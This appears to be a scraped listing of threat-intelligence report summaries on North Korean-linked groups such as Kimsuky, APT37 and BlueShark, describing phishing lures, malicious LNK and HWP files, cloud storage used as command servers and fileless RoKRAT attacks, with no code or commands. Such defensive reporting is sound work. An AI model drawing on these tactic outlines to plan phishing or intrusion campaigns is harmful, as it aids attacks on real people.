Summary:
This report highlights the ongoing phishing attacks attributed to the Kimsuky group, which have evolved to evade detection by utilizing various domains and tactics. The attackers have shifted their operations from Japan to Russia, employing malware-less strategies that exploit familiar financial themes to deceive victims.…
Read More
Author: Genians-Korea
Summary:
The report analyzes the covert cyber reconnaissance activities of the state-backed APT37 group, which targets South Korean individuals and organizations related to North Korean human rights and security. It highlights the group’s use of malicious shortcut files and the necessity for enhanced endpoint detection and response (EDR) solutions to counteract these threats.…
1. Short Summary
Read More
The BlueShark APT group has been actively targeting individuals in South Korea during the first half of 2024, utilizing various malware types and spear-phishing tactics disguised as legitimate requests for lectures and interviews.
2. Keypoints Utilization of various types of malware such as LNK, ISO, MSC, and HWP.…“`html
1. Short SummaryThe article discusses the increasing threat activity associated with the Kimsuky group, particularly focusing on the Konni campaign. It highlights the use of legitimate cloud and FTP services in a step-by-step infection chain, with various attack attempts targeting not only South Korea but also Russian government agencies.…
“`html
◈ Short Summary Utilizes tax evasion report notifications to impersonate and gain access. Creates confusion by suggesting tax audits and amplifying anxiety regarding funding sources. Attempts internal reconnaissance through LNK-type malicious files. Calls malicious script commands using legitimate AutoIt programs. Employs strategies to evade antivirus detection, making EDR responses possible.…
◈ Executive Summary
Impersonation of North Korean-related questionnaires, manuscripts, security columns, articles, and monthly magazines
Malicious files of LNK type hidden inside ZIP compressed files
Exploitation of cloud storage such as DropBox and pCloud as attack bases
Continued RoKRAT fileless attacks by APT37 group
Early detection of LNK and PowerShell stages through Genian EDR
1.…
Read More
◈ Executive Summary
Using the delivery method of HWP documents containing malicious OLE through deception and access through foreign news channel interviews
Execution of encrypted PowerShell commands using the FlowerPower APT attack tool series
Setting up the code hosting platform GitHub for version control and collaboration as a command center for threat commands
Effect of minimizing damage through threat visibility and early detection with Genian EDR solution
1.…
Read More